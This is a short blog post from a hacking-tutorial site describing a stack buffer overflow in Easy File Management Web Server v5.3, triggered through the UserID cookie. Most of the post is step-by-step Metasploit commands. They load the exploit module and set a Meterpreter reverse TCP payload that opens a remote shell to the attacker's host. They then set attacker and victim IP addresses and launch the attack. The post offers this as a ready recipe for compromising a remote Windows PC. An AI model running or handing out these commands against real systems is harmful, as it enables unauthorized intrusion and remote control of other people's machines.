Hacking Articles|Raj Chandel's Blog: Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

at 5:58 AM Friday, June 20, 2014

Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.

Exploit Targets

Easy File Management Web Server v5.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/http/efs_fmws_userid_bof

msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)

msf exploit (efs_fmws_userid_bof)>exploit

Pages

Hacking Articles|Raj Chandel's Blog

Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

0 comments:

Post a Comment

Labels

Popular Posts